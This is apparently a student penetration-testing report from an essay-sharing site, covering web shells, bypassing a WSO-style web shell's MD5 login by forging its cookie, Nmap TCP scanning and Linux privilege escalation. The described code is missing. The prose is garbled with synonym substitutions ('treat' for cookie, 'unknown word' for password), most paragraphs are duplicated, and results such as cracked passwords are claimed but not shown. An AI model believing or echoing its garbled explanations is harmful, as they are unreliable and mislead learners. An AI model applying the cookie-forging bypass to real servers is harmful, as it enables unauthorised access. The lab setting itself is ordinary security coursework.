Ethical Hacking and Defence Report: Case Study Penetration Analysis
VerifiedAdded on 2023/06/03
|16
|3773
|437
Report
AI Summary
This report details an ethical hacking penetration test of a provided case study. The project is divided into five flags, each representing a different aspect of the system compromise. The report covers examining web server contents, learning about web shells and their obfuscation, cracking passwords using various techniques, utilizing port scanning to identify vulnerabilities, and exploring Linux privilege escalation methods. The methodology includes installing and configuring the case study on a virtual machine, followed by detailed analysis and testing logs for each flag. The report also provides source code for tools used, such as Nmap for port scanning and a password cracker, along with recommendations for system security. The report demonstrates how to identify and exploit vulnerabilities to gain access and control of the system, and how to escalate privileges.
Contribute Materials
Your contribution can guide someone’s learning journey. Share your
documents today.
Ethical Hacking
Secure Best Marks with AI Grader
Need help grading? Try our AI Grader for instant feedback on your assignments.
Executive Summary
This project aim to penetrate the provided case study to provide the ethical hacking
report. This project generally divided into five flags. The flags are used for following aspects
such as examine the web server contents, learn web shell, crack the password by using the
password cracking tool, determine the user wrongly enter password by using the port
techniques and learn the basic Linux privilege escalation. These flags are will be proceed and
discussed in detail.
This project aim to penetrate the provided case study to provide the ethical hacking
report. This project generally divided into five flags. The flags are used for following aspects
such as examine the web server contents, learn web shell, crack the password by using the
password cracking tool, determine the user wrongly enter password by using the port
techniques and learn the basic Linux privilege escalation. These flags are will be proceed and
discussed in detail.
Table of Contents
Project Objective......................................................................................................................3
Methodology and Testing Log.................................................................................................3
1.1 Flag 1) examine the web server contents.................................................................4
1.2 Flag 2) Learn web shells............................................................................................4
1.3 Flag 3) Crack Password on Web shell.....................................................................6
1.4 Flag 4) Port Scanner..................................................................................................8
1.5 Flag 5) Learn basic Linux Privilege.......................................................................11
Results and Recommendations.............................................................................................12
Source code for tools used.....................................................................................................12
1.6 NMAP – TCP port Scanner....................................................................................12
1.7 Password Cracker...................................................................................................13
References...............................................................................................................................14
Project Objective......................................................................................................................3
Methodology and Testing Log.................................................................................................3
1.1 Flag 1) examine the web server contents.................................................................4
1.2 Flag 2) Learn web shells............................................................................................4
1.3 Flag 3) Crack Password on Web shell.....................................................................6
1.4 Flag 4) Port Scanner..................................................................................................8
1.5 Flag 5) Learn basic Linux Privilege.......................................................................11
Results and Recommendations.............................................................................................12
Source code for tools used.....................................................................................................12
1.6 NMAP – TCP port Scanner....................................................................................12
1.7 Password Cracker...................................................................................................13
References...............................................................................................................................14
Project Objective
Main goal of this project is to penetrate the provided case study to provide the ethical
hacking report. This project generally divided into five flags. The flags are used for following
aspects such as examine the web server contents, learn web shell, crack the password by
using the password cracking tool, determine the user wrongly enter password by using the
port scan techniques and learn the basic Linux privilege escalation. These flags are will be
proceed and discussed in detail. In crack the password flag, we are using the web shell
password cracking by deobfuscate a web shell and show how the affirmation can be evaded
when you have the source code yet not the secret word. In port scanning technique, we are
using the Nmap port scanning tool to scanning the TCP port on the system. These processes
are will be demonstrated and discussed in detail.
Methodology and Testing Log
User requires to do flag by follows the below steps.
First, user requires to install and configure the provided the case study on virtual machine.
This process is demonstrated as below.
Main goal of this project is to penetrate the provided case study to provide the ethical
hacking report. This project generally divided into five flags. The flags are used for following
aspects such as examine the web server contents, learn web shell, crack the password by
using the password cracking tool, determine the user wrongly enter password by using the
port scan techniques and learn the basic Linux privilege escalation. These flags are will be
proceed and discussed in detail. In crack the password flag, we are using the web shell
password cracking by deobfuscate a web shell and show how the affirmation can be evaded
when you have the source code yet not the secret word. In port scanning technique, we are
using the Nmap port scanning tool to scanning the TCP port on the system. These processes
are will be demonstrated and discussed in detail.
Methodology and Testing Log
User requires to do flag by follows the below steps.
First, user requires to install and configure the provided the case study on virtual machine.
This process is demonstrated as below.
Secure Best Marks with AI Grader
Need help grading? Try our AI Grader for instant feedback on your assignments.
1.1 Flag 1) examine the web server contents
The web server needs records of the site to store all the HTML reports alongside proper
assets, this could likewise incorporate the accompanying (Makan, 2014):
CSS formats
Textual Styles
Documents Of JavaScript
Recordings
Images or pictures et cetera.
It is likewise conceivable that all the previously mentioned records could be put away in a
PC. It is additionally a covered practice to store the records on a submitted web server. Since,
it benefits with the accompanying advantages such as web server is constantly connected to
Internet, Web server always contains same IP address, Web server is effectively running,
Web server can be shielded from the outside providers and Web server is tried and true
("Privilege Escalation on Linux with Live examples", 2018).
1.2 Flag 2) Learn web shells
A web-shell is a malicious substance used by an attacker with the reason to uplift and
keep up consistent access on a starting at now negotiated web application. Web-shells can't
strike or experience a remote defencelessness, so it is constantly the second step of a surprise
attack. An attacker can abuse general vulnerabilities, for instance, SQL, RFI, FTP, or even
The web server needs records of the site to store all the HTML reports alongside proper
assets, this could likewise incorporate the accompanying (Makan, 2014):
CSS formats
Textual Styles
Documents Of JavaScript
Recordings
Images or pictures et cetera.
It is likewise conceivable that all the previously mentioned records could be put away in a
PC. It is additionally a covered practice to store the records on a submitted web server. Since,
it benefits with the accompanying advantages such as web server is constantly connected to
Internet, Web server always contains same IP address, Web server is effectively running,
Web server can be shielded from the outside providers and Web server is tried and true
("Privilege Escalation on Linux with Live examples", 2018).
1.2 Flag 2) Learn web shells
A web-shell is a malicious substance used by an attacker with the reason to uplift and
keep up consistent access on a starting at now negotiated web application. Web-shells can't
strike or experience a remote defencelessness, so it is constantly the second step of a surprise
attack. An attacker can abuse general vulnerabilities, for instance, SQL, RFI, FTP, or even
use XSS as a part of a social outlining surprise attack with a particular true objective to
exchange the malicious substance (Prodromou, 2018). The typical convenience consolidates
anyway isn't confined to shell arrange execution, code execution, and database check and
record organization. Web shells are an ignored part of cybercrime and don't draw in the level
of consideration of either phishing or malware. At the point when web shells originally
showed up, the cut-off of their utility was to exchange documents and execute flexible shell
directions. Be that as it may, the best built web shells currently give top score, modern
toolboxes for differing crimes, with offices for phishing, spamming and DDoS, not
exclusively accessible through an online User interface yet in addition tolerating directions as
a major aspect of a botnet. The initial step with a web shell is transferring it to a server, from
which the aggressor would then be able to get to it. This establishment can occur in a few
different ways, however the most well-known methods include exploiting a weakness in the
server's product, getting access to a manager entrance, or Taking preferred standpoint of an
inappropriately designed host ("Web Shell Archive | PHP & ASP & ASPX Web Root
Backdoors", 2018).
Zombie
Another use of web-shells is to make servers part of a botnet. A botnet is an
arrangement of exchanged off structures that an attacker would control, either to use
themselves, or to lease to various criminals. The web-shell or indirect access is related with a
Client and communication server from which it can take headings on what rules to execute.
This setup is normally used in DDoS attack, which require clearing proportions of
transmission limit. For this circumstance, the attacker does not have any energy for harming,
or taking anything off-of the system whereupon the web shell was passed on. Or maybe, they
will fundamentally use its benefits for at whatever point is required.
Escalation of Privilege
But on the off chance that a server is misconfigured, the web shell will hold running
under the web server's customer approvals, which are confined. Using a web-shell, an
attacker can attempt to perform advantage speeding up strikes by mishandling neighbourhood
vulnerabilities on the system to acknowledge root benefits, which, in Linux and other UNIX-
based working structures is the super-customer. With access to the root account, the attacker
can essentially do anything on the system including presenting programming, developing
assents, including and ousting customers, taking passwords, examining messages and
anything is possible from that point ("Web Shells 101: Detection and Prevention", 2018).
exchange the malicious substance (Prodromou, 2018). The typical convenience consolidates
anyway isn't confined to shell arrange execution, code execution, and database check and
record organization. Web shells are an ignored part of cybercrime and don't draw in the level
of consideration of either phishing or malware. At the point when web shells originally
showed up, the cut-off of their utility was to exchange documents and execute flexible shell
directions. Be that as it may, the best built web shells currently give top score, modern
toolboxes for differing crimes, with offices for phishing, spamming and DDoS, not
exclusively accessible through an online User interface yet in addition tolerating directions as
a major aspect of a botnet. The initial step with a web shell is transferring it to a server, from
which the aggressor would then be able to get to it. This establishment can occur in a few
different ways, however the most well-known methods include exploiting a weakness in the
server's product, getting access to a manager entrance, or Taking preferred standpoint of an
inappropriately designed host ("Web Shell Archive | PHP & ASP & ASPX Web Root
Backdoors", 2018).
Zombie
Another use of web-shells is to make servers part of a botnet. A botnet is an
arrangement of exchanged off structures that an attacker would control, either to use
themselves, or to lease to various criminals. The web-shell or indirect access is related with a
Client and communication server from which it can take headings on what rules to execute.
This setup is normally used in DDoS attack, which require clearing proportions of
transmission limit. For this circumstance, the attacker does not have any energy for harming,
or taking anything off-of the system whereupon the web shell was passed on. Or maybe, they
will fundamentally use its benefits for at whatever point is required.
Escalation of Privilege
But on the off chance that a server is misconfigured, the web shell will hold running
under the web server's customer approvals, which are confined. Using a web-shell, an
attacker can attempt to perform advantage speeding up strikes by mishandling neighbourhood
vulnerabilities on the system to acknowledge root benefits, which, in Linux and other UNIX-
based working structures is the super-customer. With access to the root account, the attacker
can essentially do anything on the system including presenting programming, developing
assents, including and ousting customers, taking passwords, examining messages and
anything is possible from that point ("Web Shells 101: Detection and Prevention", 2018).
Steady Remote Access
A web-shell generally contains an unusual access which empowers an attacker to
remotely get to and possibly, control a server at whatever point. This would save the attacker
the trouble of mishandling a weakness each time access to the exchanged off server is
required. An assailant may in like manner settle the shortcoming themselves, remembering
the ultimate objective to ensure that no one else will push that weakness. Consequently the
attacker can remain under the locating system and avoid any coordinated effort with a
director, while up till now securing a comparable result. It is furthermore worth determining
that few surely understood web shells use unknown key approval and distinctive procedures
to ensure that simply the attacker exchanging the web-shell approaches it. Such techniques
join securing the substance to a specific custom HTTP header, specific treat regards, specific
IP addresses, or a mix of these frameworks. Most web shells in like manner contain code to
perceive and square web lists from posting the shell and, therefore, boycotting the zone or
server the web application is encouraged on in a manner of speaking, stealth is essential
("Web Shells – Threat Awareness and Guidance", 2018).
Propelling and Pivoting Attacks
A web-shell can be used for turning inside or outside a framework. The aggressor
should need to screen the framework development on the structure, check the inner
framework to discover live has, and list firewalls and switches inside the framework. This
methodology can take days, even months, commonly in light of the way that an attacker
ordinarily attempts to remain under the detector, and draw negligible proportion of thought
possible. Once an assailant has decided access, they can peacefully make their moves. The
exchanged off structure can in like manner be used to attack or breadth centres around that
abide outside the framework. This incorporates an additional layer of lack of clarity to the
attacker since they are using an untouchable structure to dispatch an attack. Well beyond is
turn through various systems to make it generally hard to pursue an attack back to its source
("Web Shells: The Criminal’s Control Panel | Netcraft", 2018).
1.3 Flag 3) Crack Password on Web shell
Right when a website is hacked, the attacker consistently leaves an auxiliary section or
web shell to have the ability to viably get to the webpage later on. These are routinely
confused to avoid distinguishing proof, and need check so simply the attacker can get to the
A web-shell generally contains an unusual access which empowers an attacker to
remotely get to and possibly, control a server at whatever point. This would save the attacker
the trouble of mishandling a weakness each time access to the exchanged off server is
required. An assailant may in like manner settle the shortcoming themselves, remembering
the ultimate objective to ensure that no one else will push that weakness. Consequently the
attacker can remain under the locating system and avoid any coordinated effort with a
director, while up till now securing a comparable result. It is furthermore worth determining
that few surely understood web shells use unknown key approval and distinctive procedures
to ensure that simply the attacker exchanging the web-shell approaches it. Such techniques
join securing the substance to a specific custom HTTP header, specific treat regards, specific
IP addresses, or a mix of these frameworks. Most web shells in like manner contain code to
perceive and square web lists from posting the shell and, therefore, boycotting the zone or
server the web application is encouraged on in a manner of speaking, stealth is essential
("Web Shells – Threat Awareness and Guidance", 2018).
Propelling and Pivoting Attacks
A web-shell can be used for turning inside or outside a framework. The aggressor
should need to screen the framework development on the structure, check the inner
framework to discover live has, and list firewalls and switches inside the framework. This
methodology can take days, even months, commonly in light of the way that an attacker
ordinarily attempts to remain under the detector, and draw negligible proportion of thought
possible. Once an assailant has decided access, they can peacefully make their moves. The
exchanged off structure can in like manner be used to attack or breadth centres around that
abide outside the framework. This incorporates an additional layer of lack of clarity to the
attacker since they are using an untouchable structure to dispatch an attack. Well beyond is
turn through various systems to make it generally hard to pursue an attack back to its source
("Web Shells: The Criminal’s Control Panel | Netcraft", 2018).
1.3 Flag 3) Crack Password on Web shell
Right when a website is hacked, the attacker consistently leaves an auxiliary section or
web shell to have the ability to viably get to the webpage later on. These are routinely
confused to avoid distinguishing proof, and need check so simply the attacker can get to the
Paraphrase This Document
Need a fresh take? Get an instant paraphrase of this document with our AI Paraphraser
site. In this task, I am going to deobfuscate a web shell and show how the affirmation can be
evaded when you have the source code yet not the unknown word ("What are web shells –
Tutorial", 2018).
Web shell Deobfuscating
The preg_replace has three disputes, the regex, the substitution and the subject. Since
the regex has the e modifier, it will evaluate anything in the substitution as PHP code. This is
along these lines like the going with code:
Directly we understand that the second parameter is evaluated, anyway regardless of
all that it doesn't look like PHP code. That is because of it is hex encoded. A string in twofold
proclamations can contain some break courses of action that are interpreted by PHP, and one
of them is \x to put a character in the string using hexadecimal documentation. For example, \
x65 would be an e since it says so in the ASCII table. Physically changing over this string
would be a pinch of work, so we let PHP do it:
Sidestepping check
The $auth_pass in the main code starting at now suggested there would be approval
on the web shell. The plan of $auth_pass, 32 hexadecimal characters, recommend that it is a
MD5 of the plaintext unknown word. Since we have the wellspring of the web shell, we can
assert that:
It finishes a MD5 over the posted pass parameter, and watches that against
$auth_pass. Plain MD5s are commonly not an incredibly secure way to deal with store
passwords. In particular, MD5 is speedy and you can join billions of hashes for each second
to endeavour to gentle power the unknown expression. Also, the MD5 total for a few, weak
passwords is starting at now on the web and can be found by a active Google look. In any
evaded when you have the source code yet not the unknown word ("What are web shells –
Tutorial", 2018).
Web shell Deobfuscating
The preg_replace has three disputes, the regex, the substitution and the subject. Since
the regex has the e modifier, it will evaluate anything in the substitution as PHP code. This is
along these lines like the going with code:
Directly we understand that the second parameter is evaluated, anyway regardless of
all that it doesn't look like PHP code. That is because of it is hex encoded. A string in twofold
proclamations can contain some break courses of action that are interpreted by PHP, and one
of them is \x to put a character in the string using hexadecimal documentation. For example, \
x65 would be an e since it says so in the ASCII table. Physically changing over this string
would be a pinch of work, so we let PHP do it:
Sidestepping check
The $auth_pass in the main code starting at now suggested there would be approval
on the web shell. The plan of $auth_pass, 32 hexadecimal characters, recommend that it is a
MD5 of the plaintext unknown word. Since we have the wellspring of the web shell, we can
assert that:
It finishes a MD5 over the posted pass parameter, and watches that against
$auth_pass. Plain MD5s are commonly not an incredibly secure way to deal with store
passwords. In particular, MD5 is speedy and you can join billions of hashes for each second
to endeavour to gentle power the unknown expression. Also, the MD5 total for a few, weak
passwords is starting at now on the web and can be found by a active Google look. In any
case, our developer has picked a very OK unknown key, and I was not capable part it.
Regardless, there is another way to deal with access the web shell now that we have the
source code. As ought to be clear in the code it sets a specific treat when you get the
unknown word right. It checks the treat and if you have it wrong it considers wsoLogin to
show to you a login page and leave the substance. Else it continues with the web shell code.
The treat expected have the MD5 of the hostname as key, and the $auth_pass substance as
substance. Luckily, we know both these characteristics and can make our very own treat to
get to the web shell.
Update
Finally, below passwords are cracked.
1.4 Flag 4) Port Scanner
Port filtering is a strategy used to perceive if a port on the target have is open or close; a
port can be open if there is an organization that uses that specific port to talk with various
systems. This is the inspiration driving why if a port is open it is possible to over the long
haul perceive what kind of organization uses it by sending phenomenally made packages to
the goal. When we know the target IP address we can dispatch the port checking attack.
Obviously, if no decision is picked, Nmap runs a TCP SYN Scan generally called Stealth
Scan ("Advanced Port Scanner – free and quick port scanner", 2018). The majority of the
sweep composes are just accessible to advantaged clients. This is on account of they send and
get raw parcels, which requires root access on UNIX frameworks. Utilizing an executive
record on Windows is suggested, however Nmap in some cases works for unprivileged
clients on that stage when Nmap has just been stacked into the OS ("Nmap Cheat Sheet and
Pro Tips | HackerTarget.com", 2018). Requiring root benefits was a genuine constraint when
Nmap was discharged in 1997, the same number of clients just approached shared shell
accounts. Presently, the world is extraordinary. PCs are less expensive, undeniably
individuals have dependably on direct Internet access, and work area UNIX frameworks
(counting Linux and Mac OS X) are pervasive. A Windows adaptation of Nmap is currently
accessible, enabling it to keep running on much more work areas. For every one of these
Regardless, there is another way to deal with access the web shell now that we have the
source code. As ought to be clear in the code it sets a specific treat when you get the
unknown word right. It checks the treat and if you have it wrong it considers wsoLogin to
show to you a login page and leave the substance. Else it continues with the web shell code.
The treat expected have the MD5 of the hostname as key, and the $auth_pass substance as
substance. Luckily, we know both these characteristics and can make our very own treat to
get to the web shell.
Update
Finally, below passwords are cracked.
1.4 Flag 4) Port Scanner
Port filtering is a strategy used to perceive if a port on the target have is open or close; a
port can be open if there is an organization that uses that specific port to talk with various
systems. This is the inspiration driving why if a port is open it is possible to over the long
haul perceive what kind of organization uses it by sending phenomenally made packages to
the goal. When we know the target IP address we can dispatch the port checking attack.
Obviously, if no decision is picked, Nmap runs a TCP SYN Scan generally called Stealth
Scan ("Advanced Port Scanner – free and quick port scanner", 2018). The majority of the
sweep composes are just accessible to advantaged clients. This is on account of they send and
get raw parcels, which requires root access on UNIX frameworks. Utilizing an executive
record on Windows is suggested, however Nmap in some cases works for unprivileged
clients on that stage when Nmap has just been stacked into the OS ("Nmap Cheat Sheet and
Pro Tips | HackerTarget.com", 2018). Requiring root benefits was a genuine constraint when
Nmap was discharged in 1997, the same number of clients just approached shared shell
accounts. Presently, the world is extraordinary. PCs are less expensive, undeniably
individuals have dependably on direct Internet access, and work area UNIX frameworks
(counting Linux and Mac OS X) are pervasive. A Windows adaptation of Nmap is currently
accessible, enabling it to keep running on much more work areas. For every one of these
reasons, clients have less need to run Nmap from constrained shared shell accounts. This is
blessed, as the favoured choices make Nmap unquestionably ground-breaking and adaptable.
To appreciate this kind of breadth it has a tendency to be useful to restore the TCP 3-way
handshake theory which addresses the way in which a TCP affiliation starts.
TCP Scan
A TCP SYN Scan works thusly: framework A, which speaks to our assaulting
machine, sends to the objective framework B the SYN and sits tight for the SYN-ACK. In the
event that B reacts, which implies the port is open, A does not send the last ACK. On the off
chance that A does not get the SYN-ACK the port can be either shut or separated (this can
show the nearness of a Firewall). Along these lines we have played out a TCP port sweep
without setting up a full association with the objective.
Continuing and specifying:
• Open port: A sends SYN to B and B reacts with SYN-ACK;
• Closed port: A sends SYN to B and B reacts with RST-ACK;
• Filtered port: A sends SYN to B, yet does not get a reaction or gets an ICMP port
inaccessible blunder message.
Regardless of whether this kind of output is the default one, we can set it up with the "- sS"
parameter pursued by the IP address of the objective ("TCP Port Scan with Nmap | Pentest-
Tools.com", 2018):
blessed, as the favoured choices make Nmap unquestionably ground-breaking and adaptable.
To appreciate this kind of breadth it has a tendency to be useful to restore the TCP 3-way
handshake theory which addresses the way in which a TCP affiliation starts.
TCP Scan
A TCP SYN Scan works thusly: framework A, which speaks to our assaulting
machine, sends to the objective framework B the SYN and sits tight for the SYN-ACK. In the
event that B reacts, which implies the port is open, A does not send the last ACK. On the off
chance that A does not get the SYN-ACK the port can be either shut or separated (this can
show the nearness of a Firewall). Along these lines we have played out a TCP port sweep
without setting up a full association with the objective.
Continuing and specifying:
• Open port: A sends SYN to B and B reacts with SYN-ACK;
• Closed port: A sends SYN to B and B reacts with RST-ACK;
• Filtered port: A sends SYN to B, yet does not get a reaction or gets an ICMP port
inaccessible blunder message.
Regardless of whether this kind of output is the default one, we can set it up with the "- sS"
parameter pursued by the IP address of the objective ("TCP Port Scan with Nmap | Pentest-
Tools.com", 2018):
Secure Best Marks with AI Grader
Need help grading? Try our AI Grader for instant feedback on your assignments.
Nmap, if not decided in a surprising way, sets the yield to test the most broadly
perceived more than 950 ports and encounters them irregularly. As ought to be evident from
the results, we have analysed more than 950 ports in 0.30 seconds and 937 of them are
represented as closed and opened ones. Nmap gives us information about the organization
that is running on them ("Tcp Port Scanner (Free)", 2018).
For every one of these reasons, clients have less need to run Nmap from constrained
shared shell accounts. This is blessed, as the special alternatives make Nmap unquestionably
ground breaking and adaptable. While Nmap endeavours to create precise outcomes,
remember that the majority of its bits of knowledge depend on packets returned by the
objective machines. Such has might be corrupt and send reactions proposed to confound or
misdirect Nmap. Substantially more typical are non RFC consistent hosts that don't react as
they ought to Nmap tests. FIN, NULL, and Xmas checks are especially helpless to this issue.
perceived more than 950 ports and encounters them irregularly. As ought to be evident from
the results, we have analysed more than 950 ports in 0.30 seconds and 937 of them are
represented as closed and opened ones. Nmap gives us information about the organization
that is running on them ("Tcp Port Scanner (Free)", 2018).
For every one of these reasons, clients have less need to run Nmap from constrained
shared shell accounts. This is blessed, as the special alternatives make Nmap unquestionably
ground breaking and adaptable. While Nmap endeavours to create precise outcomes,
remember that the majority of its bits of knowledge depend on packets returned by the
objective machines. Such has might be corrupt and send reactions proposed to confound or
misdirect Nmap. Substantially more typical are non RFC consistent hosts that don't react as
they ought to Nmap tests. FIN, NULL, and Xmas checks are especially helpless to this issue.
Such issues are particular to certain output composes as are talked about in the individual
sweep compose passages.
TCP SYN check
SYN check is the default and most famous sweep alternative for valid justifications. It
tends to be performed rapidly, checking a large number of ports every second on a quick
system not vulnerable by prohibitive firewalls. It is likewise generally unaffected and stealthy
since it never finishes TCP associations. SYN check deactivates any consistent TCP stack
instead of relying upon behaviours of particular stages as Nmap's FIN, NULL and Xmas and
sit without moving outputs do. It likewise permits clear, dependable separation between the
open, shut, and sifted states. This system is frequently mentioned to as half open checking, in
light of the fact that you don't open a full TCP association. You send a SYN packet, as
though you will open a genuine association and after that sit tight for a reaction. A SYN/ACK
demonstrates the port is tuning in, while a RST is characteristic of a non-audience. On the off
chance that no reaction is gotten after a few retransmissions, the port is set apart as separated.
The port is likewise stamped separated if an ICMP unreachable mistake is gotten. The port is
likewise viewed as open if a SYN packet is gotten accordingly. This can be because of a
greatly uncommon TCP highlight known as a synchronous open or split handshake
association.
TCP associate sweep
TCP associate sweep is the default TCP examine type when SYN filter isn't an
alternative. This is the situation when a client does not have raw packet benefits. Rather than
composing raw packets as most other output composes do, Nmap asks the basic working
framework to set up an association with the objective machine and port by issuing the
interface framework call. This is a similar abnormal state framework call that internet
browsers, P2P customers, and most other system empowered applications use to set up an
association. It is a piece of a programming interface known as the Berkeley Sockets API.
Instead of read raw packet reactions off the wire, Nmap utilizes this API to acquire status
data on every association endeavour.
1.5 Flag 5) Learn basic Linux Privilege
This flag is used to provide the gain knowledge about basic Linux privilege escalation. These
are listed in below ("Basic Linux Privilege Escalation", 2018),
Operating System
sweep compose passages.
TCP SYN check
SYN check is the default and most famous sweep alternative for valid justifications. It
tends to be performed rapidly, checking a large number of ports every second on a quick
system not vulnerable by prohibitive firewalls. It is likewise generally unaffected and stealthy
since it never finishes TCP associations. SYN check deactivates any consistent TCP stack
instead of relying upon behaviours of particular stages as Nmap's FIN, NULL and Xmas and
sit without moving outputs do. It likewise permits clear, dependable separation between the
open, shut, and sifted states. This system is frequently mentioned to as half open checking, in
light of the fact that you don't open a full TCP association. You send a SYN packet, as
though you will open a genuine association and after that sit tight for a reaction. A SYN/ACK
demonstrates the port is tuning in, while a RST is characteristic of a non-audience. On the off
chance that no reaction is gotten after a few retransmissions, the port is set apart as separated.
The port is likewise stamped separated if an ICMP unreachable mistake is gotten. The port is
likewise viewed as open if a SYN packet is gotten accordingly. This can be because of a
greatly uncommon TCP highlight known as a synchronous open or split handshake
association.
TCP associate sweep
TCP associate sweep is the default TCP examine type when SYN filter isn't an
alternative. This is the situation when a client does not have raw packet benefits. Rather than
composing raw packets as most other output composes do, Nmap asks the basic working
framework to set up an association with the objective machine and port by issuing the
interface framework call. This is a similar abnormal state framework call that internet
browsers, P2P customers, and most other system empowered applications use to set up an
association. It is a piece of a programming interface known as the Berkeley Sockets API.
Instead of read raw packet reactions off the wire, Nmap utilizes this API to acquire status
data on every association endeavour.
1.5 Flag 5) Learn basic Linux Privilege
This flag is used to provide the gain knowledge about basic Linux privilege escalation. These
are listed in below ("Basic Linux Privilege Escalation", 2018),
Operating System
File Systems
Preparation & Finding Exploit Code
Applications & Services
Communications & Networking
Confidential Information & Users
Results and Recommendations
This project is successfully penetrated the provided case study to provide the ethical
hacking report. This project generally divided into five flags. The flags are used for following
aspects such as examine the web server contents, learn web shell, crack the password by
using the password cracking tool, determine the user wrongly enter password by using the
port scan techniques and learn the basic Linux privilege escalation. These flags are
successfully demonstrated and discussed in detail. In crack the password flag, we are used
web shell password cracking by deobfuscate a web shell and show how the affirmation can
be evaded when you have the source code yet not the secret word. In port scanning technique,
we are used the Nmap port scanning tool to successfully scanned the TCP port on the system.
These processes are demonstrated and discussed in detail.
Source code for tools used
1.6 NMAP – TCP port Scanner
To scan the TCP port on Nmap by using the under command or source code ("Port Scanning
Techniques | Nmap Network Scanning", 2018).
nmap ip address
nmap 192.168.1.1
It deliver the below results.
Preparation & Finding Exploit Code
Applications & Services
Communications & Networking
Confidential Information & Users
Results and Recommendations
This project is successfully penetrated the provided case study to provide the ethical
hacking report. This project generally divided into five flags. The flags are used for following
aspects such as examine the web server contents, learn web shell, crack the password by
using the password cracking tool, determine the user wrongly enter password by using the
port scan techniques and learn the basic Linux privilege escalation. These flags are
successfully demonstrated and discussed in detail. In crack the password flag, we are used
web shell password cracking by deobfuscate a web shell and show how the affirmation can
be evaded when you have the source code yet not the secret word. In port scanning technique,
we are used the Nmap port scanning tool to successfully scanned the TCP port on the system.
These processes are demonstrated and discussed in detail.
Source code for tools used
1.6 NMAP – TCP port Scanner
To scan the TCP port on Nmap by using the under command or source code ("Port Scanning
Techniques | Nmap Network Scanning", 2018).
nmap ip address
nmap 192.168.1.1
It deliver the below results.
Paraphrase This Document
Need a fresh take? Get an instant paraphrase of this document with our AI Paraphraser
1.7 Password Cracker
Source code is attached here.
Run the PHP code on Kali Linux (Valentino, 2018). It is provide the hidden password.
Source code is attached here.
Run the PHP code on Kali Linux (Valentino, 2018). It is provide the hidden password.
References
Advanced Port Scanner – free and fast port scanner. (2018). Retrieved from
http://www.advanced-port-scanner.com/
Basic Linux Privilege Escalation. (2018). Retrieved from
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Makan, K. (2014). Penetration Testing with the Bash shell. Packt Publishing.
Nmap Cheat Sheet and Pro Tips | HackerTarget.com. (2018). Retrieved from
https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/
Port Scanning Techniques | Nmap Network Scanning. (2018). Retrieved from
https://nmap.org/book/man-port-scanning-techniques.html
Privilege Escalation on Linux with Live examples. (2018). Retrieved from
https://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/
Prodromou, A. (2018). An Introduction to Web-shells - Part 1 | Acunetix. Retrieved from
https://www.acunetix.com/blog/articles/introduction-web-shells-part-1/
TCP Port Scan with Nmap | Pentest-Tools.com. (2018). Retrieved from https://pentest-
tools.com/network-vulnerability-scanning/tcp-port-scanner-online-nmap
Tcp Port Scanner (Free). (2018). Retrieved from http://www.mylanviewer.com/port-
scanner.html
Valentino, V. (2018). PHP Web Shell and Stealth Backdoor : Weevely 2. Retrieved from
https://www.hacking-tutorial.com/hacking-tutorial/php-web-shell-and-stealth-backdoor-
weevely/
Web Shell Archive | PHP & ASP & ASPX Web Root Backdoors. (2018). Retrieved from
https://webshell.co/
Web Shells 101: Detection and Prevention. (2018). Retrieved from
https://blog.rapid7.com/2016/12/14/webshells-101/
Web Shells – Threat Awareness and Guidance. (2018). Retrieved from https://www.us-
cert.gov/ncas/alerts/TA15-314A
Advanced Port Scanner – free and fast port scanner. (2018). Retrieved from
http://www.advanced-port-scanner.com/
Basic Linux Privilege Escalation. (2018). Retrieved from
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Makan, K. (2014). Penetration Testing with the Bash shell. Packt Publishing.
Nmap Cheat Sheet and Pro Tips | HackerTarget.com. (2018). Retrieved from
https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/
Port Scanning Techniques | Nmap Network Scanning. (2018). Retrieved from
https://nmap.org/book/man-port-scanning-techniques.html
Privilege Escalation on Linux with Live examples. (2018). Retrieved from
https://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/
Prodromou, A. (2018). An Introduction to Web-shells - Part 1 | Acunetix. Retrieved from
https://www.acunetix.com/blog/articles/introduction-web-shells-part-1/
TCP Port Scan with Nmap | Pentest-Tools.com. (2018). Retrieved from https://pentest-
tools.com/network-vulnerability-scanning/tcp-port-scanner-online-nmap
Tcp Port Scanner (Free). (2018). Retrieved from http://www.mylanviewer.com/port-
scanner.html
Valentino, V. (2018). PHP Web Shell and Stealth Backdoor : Weevely 2. Retrieved from
https://www.hacking-tutorial.com/hacking-tutorial/php-web-shell-and-stealth-backdoor-
weevely/
Web Shell Archive | PHP & ASP & ASPX Web Root Backdoors. (2018). Retrieved from
https://webshell.co/
Web Shells 101: Detection and Prevention. (2018). Retrieved from
https://blog.rapid7.com/2016/12/14/webshells-101/
Web Shells – Threat Awareness and Guidance. (2018). Retrieved from https://www.us-
cert.gov/ncas/alerts/TA15-314A
Web Shells: The Criminal’s Control Panel | Netcraft. (2018). Retrieved from
https://news.netcraft.com/archives/2017/05/18/web-shells-the-criminals-control-
panel.html
What are web shells – Tutorial. (2018). Retrieved from https://www.binarytides.com/web-
shells-tutorial/
https://news.netcraft.com/archives/2017/05/18/web-shells-the-criminals-control-
panel.html
What are web shells – Tutorial. (2018). Retrieved from https://www.binarytides.com/web-
shells-tutorial/
1 out of 16
Related Documents
Your All-in-One AI-Powered Toolkit for Academic Success.
+13062052269
info@desklib.com
Available 24*7 on WhatsApp / Email
![[object Object]](/_next/static/media/star-bottom.7253800d.svg)
Unlock your academic potential
© 2024 | Zucol Services PVT LTD | All rights reserved.